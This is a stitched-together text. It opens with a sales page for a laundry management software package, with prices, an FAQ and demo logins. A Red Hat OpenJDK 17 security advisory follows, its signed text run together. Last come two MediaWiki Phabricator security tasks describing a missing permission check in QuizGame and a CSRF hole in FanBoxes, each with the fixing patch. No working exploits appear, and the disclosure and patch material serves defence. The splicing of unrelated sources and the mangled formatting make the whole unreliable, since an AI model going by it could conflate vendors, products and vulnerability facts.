*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI
*   One Year Free Service & Updates.

Buy Now

**RPL Professional Package  
(E-Commerce\*)****INR 45K USD $599/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS+E-Comm Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)
*   One Year Free Service & Updates.

Buy Now

**RPL Development Package  
(Customization\*\*)****Extra 50% POS+50% (OR) E-Commerce+50%**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS/E-Commerce Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)         \[ as per your requirements\*\* \]
*   One Year Free Service & Updates.

Buy Now

\* Terms and Conditions apply (see FAQ section )  
\*\* Cost may vary depends on the customization

**Frequently Asked Questions**

Here are some of the most Frequently Asked Questions for Laundry Management Systems.

*   Can we get all liceses for lifetime ?
    
    Ans : Yes, if you purchase application with full source code then it's one-time payment and you will get multiple digital license \[lifetime\]. The amount is non-refundable , Once if you have got full source code then you will not getting return amount for any circumstances.
    
*   After purchase full source code can we sell this software ?
    
    Ans : Yes, after purchase application with full source code then you can use or sell anywhere with remove red planet computers company logo and name.
    
*   Can you will provide full source code ?
    
    Ans : Yes, you should have to pay 100% amount, if you want application with full source code. We will send full source code (zip or download link ) within half hours after successfully payment done. We will not provide any kind of equipment. Only RPL Business Package we will not provide source files.
    
*   What is **RPL Development / Customization Package** ?
    
    Ans : If you want manipulation or any changes in application through our professional developer team then you will have to pay selected (standard or professional) package amount plus extra 50% amount for manipulation charges. **Firstly, you have to pay 70% amount of total amount** and remaining 30% amount to pay after project completed, but note that in this period you will not getting full source code, you will getting our web hosting softwares link for testing, after completed project and 100% payment done then we will upload full source code in your website/web hosting server or send full source code link).  
    \- As per your requirement, project will be completed within 20-25 days or earlier.  
    \- Bulk SMS, Payment Gateway, Apple App Store, Google Map API & Play Store Console charges you will have to pay, if you are require.
    
*   Service and Support ?
    
    Ans : We will provide a FREE technical support upto one year after purchase LMS Application. We will answer your question regarding website management, technical details or anything about operating your own website; we can provide this through remotly in 24x7 Hours.
    

**Free Trail Full Version**

Not required fill any personal information or credit card details just click on button and login it

Username : admin  
Password : 1234  
\[ Admin Login Details \]

  
Best view in Desktop or Laptop

Mobile : 8767228990  
Password : 1983  
\[ Demo User Login Details \]

  
Best view in Desktop or Laptop

User Mobile : 8767228990  
Driver Mobile : 1234567890  
\[ Demo User / Driver Login Details \]

   
iOS app install : Download and Extract zip in Mac-OS then drag-drop .app file on Xcode 10+ simulator or connected iphone {iOS v10.0+}.

**Contact**

You can call to us 24x7 regarding Laundry Management System enquiry or solutions

**Location:**

B-02, Sai Sanklap Complex, Survey No. 145/0,  
Usarli Khurd, Panvel, Mumbai, India 410206

**Call:**

Mobile : +91 87672 28990.  
Whatsapp : +91 87672 28990.  
Skype : rpcits2013 / +918767228990.

Red Hat Security Advisory 2022-1436-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for portable Linux serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Important: OpenJDK 17.0.3 security update for Portable Linux BuildsAdvisory ID:       RHSA-2022:1436-01Product:           OpenJDKAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:1436Issue date:        2022-04-28CVE Names:         CVE-2022-21426 CVE-2022-21434 CVE-2022-21443                   CVE-2022-21449 CVE-2022-21476 CVE-2022-21496====================================================================1. Summary:The Red Hat build of OpenJDK 17 (java-17-openjdk) is now available forportable Linux.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.2. Description:The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment andthe OpenJDK 17 Java Software Development Kit.This release of the Red Hat build of OpenJDK 17 (17.0.3) for portable Linuxserves as a replacement for the Red Hat build of OpenJDK 17 (17.0.2) andincludes security and bug fixes, and enhancements. For further information,refer to the release notes linked to in the References section.Security Fix(es):* OpenJDK: Unbounded memory allocation when compiling crafted XPathexpressions (JAXP, 8270504) (CVE-2022-21426)* OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)(CVE-2022-21443)* OpenJDK: Improper object-to-string conversion inAnnotationInvocationHandler (Libraries, 8277672) (CVE-2022-21434)* OpenJDK: Defective secure validation in Apache Santuario (Libraries,8278008) (CVE-2022-21476)* OpenJDK: URI parsing inconsistencies (JNDI, 8278972) (CVE-2022-21496)* OpenJDK: Improper ECDSA signature verification (Libraries, 8277233)(CVE-2022-21449)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying this update, make sure all previously-released erratarelevant to your system have been applied.For details on how to apply this update, refer to:https://access.redhat.com/documentation/en-us/openjdk/17/html/installing_and_using_openjdk_17_on_rhel/installing-openjdk11-on-rhel8_openjdk#installing-jdk11-on-rhel-using-archive_openjdk4. Bugs fixed (https://bugzilla.redhat.com/):2075788 - CVE-2022-21426 OpenJDK: Unbounded memory allocation when compiling crafted XPath expressions (JAXP, 8270504)2075793 - CVE-2022-21443 OpenJDK: Missing check for negative ObjectIdentifier (Libraries, 8275151)2075821 - CVE-2022-21449 OpenJDK: Improper ECDSA signature verification (Libraries, 8277233)2075836 - CVE-2022-21434 OpenJDK: Improper object-to-string conversion in AnnotationInvocationHandler (Libraries, 8277672)2075842 - CVE-2022-21476 OpenJDK: Defective secure validation in Apache Santuario (Libraries, 8278008)2075849 - CVE-2022-21496 OpenJDK: URI parsing inconsistencies (JNDI, 8278972)5. References:https://access.redhat.com/security/cve/CVE-2022-21426https://access.redhat.com/security/cve/CVE-2022-21434https://access.redhat.com/security/cve/CVE-2022-21443https://access.redhat.com/security/cve/CVE-2022-21449https://access.redhat.com/security/cve/CVE-2022-21476https://access.redhat.com/security/cve/CVE-2022-21496https://access.redhat.com/security/updates/classification/#important6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBYmsX/NzjgjWX9erEAQiNsw//avZlFkUgXnhSy/6zO6tRFmvkczPDR3dgtCVtxdrd8w46/paI/RDc5FWd9CqCVQgBIEqdiwUYBEFSIU9V9dv9bPYSBsK4+CeusT9oZc7Cb7fe/HNrh5L1mKALdFt1DTfyB/1pKyIrvLWL1yK3Nu9AHnTeoTRN+x9i/+AYi0GYWDU3Wh6XPjXz2BLSga50I1uoX2yRWuXUvns+vO7Hljzp+NwbJ0ANhTaEPABxJePijWUgvPklFZscq20ETytmbggtWGEiOyKi/xzpXbatt/CW1nizSNcdTklz5WB5qvAbqq2N6BjSEE1A5fc82Q2UFqX9RVvRksCKj72PxMyqmbxaX4znvphPXry/Z4phVJi3FIWJKBVGuOQQ/tro7KohElmPZueuSHsgUlq/fJovI5uT3ha7JHl7KmcTXxtAzQFtJFPAWeUKYfMGeRovYVZFQrTtbZWpya0H+ERi5NgBnhMmCY56qxbENeVvpyWUV1Hc8c/Se8oAdyrgd5OdknXzTcea4vs9qG+HfNArOLeDqzyBsxF+zv5O7+sZNIk6BZJKtMEFoE4BV/oUji1n9PBQgZRwIVSj0vKWUgXl50uMfclkmyaOVs09sbZ/DdKzMvQafcAyUX5fZnUfQc4fvXH/PAVcdLnEO6Op4BIEuMClYV3Mf/lG2z/yi5WrnFsnAwYpBrM=miaH-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1436-01

The admin API module in the QuizGame extension for MediaWiki through 1.37.2 (before 665e33a68f6fa1167df99c0aa18ed0157cdf9f66) omits a check for the quizadmin user.

**

QuizGame: Administrative API module lets unauthenticated requests through

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

In 88754ee5b7c7f745f1172cf0238f8e65442e1bd0 (27 July 2013 (!)) I converted QuizGame to use an API module instead of the then-deprecated sajax\_\* functions provided by MediaWiki core to make the extension compatible with MediaWiki 1.21.  
The old AJAX entry point, wfQuestionGameAdmin, which despite the name **wasn't** admin-only nor truly intended to be such as it handles flagging, did feature a rudimentary "is the request allowed?" check; but I'm not sure if it really provided any _real_ security. Either way, when creating the API module, even this check was lost.

So right now all the API module really cares about is that:  
1.) The request has a valid anti-CSRF token (new mw.Api().postWithEditToken( ... ) will take care of that)  
2.) The request was POSTed  
3.) The quizaction and id parameters are set and that the former corresponds to one of the actions handled by the module's switch() loop

As long as those requirements are met, an attacker can easily abuse the QuizGame administrative API to their nefarious purposes - quizadmin rights not needed!

Hilariously, though, the UI in /extensions/QuizGame/includes/specials/SpecialQuizGameHome.php **does** perform correct user right checks for the admin panel and whatnot and redirects unauthorized users to the main quiz game landing page.

Quick patch to add block and proper user rights checking to the QuizGame admin API (while allowing all users to flag quizzes):

diff --git a/includes/api/ApiQuizGame.php b/includes/api/ApiQuizGame.php
index 3236d7e..56d5a82 100644
\--- a/includes/api/ApiQuizGame.php
+++ b/includes/api/ApiQuizGame.php
@@ -34,6 +34,21 @@ class ApiQuizGame extends ApiBase {
                // ApiBase's getDB() supports only slave connections, lame...
                $dbw = wfGetDB( DB\_PRIMARY );
 
\+               // Fail early if the user is sitewide blocked.
\+               // (This snippet copied from MW core /includes/api/ApiTag.php)
\+               $block = $user->getBlock();
\+               if ( $block && $block->isSitewide() ) {
\+                       $this->dieBlocked( $block );
\+               }
+
\+               // Allow non-quizadmins to use the flagging feature but require quizadmin
\+               // rights for all other stuff
\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }
+
                switch ( $action ) {
                        case 'unprotectItem':
                                $dbw->update(

*   Mentions

**Event Timeline**

Comment Actions

From 26cab2b8ca3fba27849c7453f48b7f9189e89fc9 Mon Sep 17 00:00:00 2001
From: www-data <www-data@miraheze.org>
Date: Mon, 21 Feb 2022 22:06:16 +0000
Subject: \[SECURITY\] QuizGame: Administrative API module lets
 unauthenticated requests through

\---
 includes/api/ApiQuizGame.php | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/includes/api/ApiQuizGame.php b/includes/api/ApiQuizGame.php
index 3236d7e..081e64e 100644
\--- a/includes/api/ApiQuizGame.php
+++ b/includes/api/ApiQuizGame.php
@@ -34,6 +34,21 @@ class ApiQuizGame extends ApiBase {
 		// ApiBase's getDB() supports only slave connections, lame...
 		$dbw = wfGetDB( DB\_PRIMARY );
 
\+               // Fail early if the user is sitewide blocked.
\+               // (This snippet copied from MW core /includes/api/ApiTag.php)
\+               $block = $user->getBlock();
\+               if ( $block && $block->isSitewide() ) {
\+                       $this->dieBlocked( $block );
\+               }
+
\+               // Allow non-quizadmins to use the flagging feature but require quizadmin
\+               // rights for all other stuff
\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }
+
 		switch ( $action ) {
 			case 'unprotectItem':
 				$dbw->update(
\-- 
2.30.2

didn't apply for me, ended up working with sudo -u www-data git apply --ignore-space-change --ignore-whitespace ~/quizgame.patch

That's the new patch file

Comment Actions

The patch looks correct to me, +2. One nit:

\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }

These two if blocks can be merged: if ( $action !== 'flagItem' && !$user->isAllowed( 'quizadmin' ) ).

(Aso in the future it's better to post patches as attachments generated with git format-patch HEAD~1, so that any weird whitespace, etc. are preserved.)

Also, also, I noticed that SpecialQuizGameHome is checking for \*any\* block, not a sitewide block. That can be fixed publicly, I just looked because you mentioned it implemented the checks correctly.

ashley closed this task as Resolved.Mar 28 2022, 5:13 PM

Comment Actions

Finally closing this as the patch was merged about a month ago (oops). @Legoktm's note regarding Special:QuizGameHome is worth investigating, but that's a separate matter altogether. (Social-Tools basically have no knowledge and thus no support for the concept of partial blocks; you're either blocked or not, social tools don't currently care about how partial the block is.)

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-29906: Administrative API module lets unauthenticated requests through

The FanBoxes extension for MediaWiki through 1.37.2 (before 027ffb0b9d6fe0d823810cf03f5b562a212162d4) allows Special:UserBoxes CSRF.

**

FanBoxes: classic CSRF in Special:UserBoxes

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Special:UserBoxes, the special page used to create new social user boxes and edit existing ones (pages in the UserBox: namespace), does not check for the presence of an anti-CSRF token, it will happily create/update the requested page as long as the request was POSTed and the desired form fields are set.

Quick patch:

diff --git a/includes/specials/SpecialFanBoxes.php b/includes/specials/SpecialFanBoxes.php
index aac26be..7835e2d 100644
\--- a/includes/specials/SpecialFanBoxes.php
+++ b/includes/specials/SpecialFanBoxes.php
@@ -115,6 +115,7 @@ class FanBoxes extends SpecialPage {
                        $output .= Html::hidden( 'textColorLeftSideColor', $update\_fan->getFanBoxLeftTextColor(), \[ 'id' => 'textColorLeftSideColor' \] ) . "\\n";
                        $output .= Html::hidden( 'bgColorRightSideColor', $update\_fan->getFanBoxRightBgColor(), \[ 'id' => 'bgColorRightSideColor' \] ) . "\\n";
                        $output .= Html::hidden( 'textColorRightSideColor', $update\_fan->getFanBoxRightTextColor(), \[ 'id' => 'textColorRightSideColor' \] ) . "\\n";
\+                       $output .= Html::hidden( 'wpEditToken', $user->getEditToken() );
 
                        $fantag\_image\_tag = '';
                        if ( $update\_fan->getFanBoxImage() ) {
@@ -254,6 +255,8 @@ class FanBoxes extends SpecialPage {
                        <input type="hidden" name="bgColorRightSideColor" id="bgColorRightSideColor" value="" />
                        <input type="hidden" name="textColorRightSideColor" id="textColorRightSideColor" value="" />';
 
\+                       $output .= Html::hidden( 'wpEditToken', $user->getEditToken() );
+
                        if ( !$destination ) {
                                $output .= '<h2 class="fanbox-form-label">' . $this->msg( 'fanbox-title' )->escaped() . '</h2>
                                        <div class="create-fanbox-title">
@@ -330,6 +333,13 @@ class FanBoxes extends SpecialPage {
 
                // Send values to database and create fantag page when form is submitted
                if ( $request->wasPosted() ) {
\+                       // Protect against CSRF
\+                       if ( !$user->matchEditToken( $request->getVal( 'wpEditToken' ) ) ) {
\+                               $out->addWikiMsg( 'sessionfailure' );
\+                               $out->addReturnTo( $this->getPageTitle() );
\+                               return;
\+                       }
+
                        if ( !$fanboxId ) {
                                // @phan-suppress-next-line PhanTypeMismatchArgumentNullable
                                $fan = FanBox::newFromName( $title );

**Event Timeline**

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

Tag

#php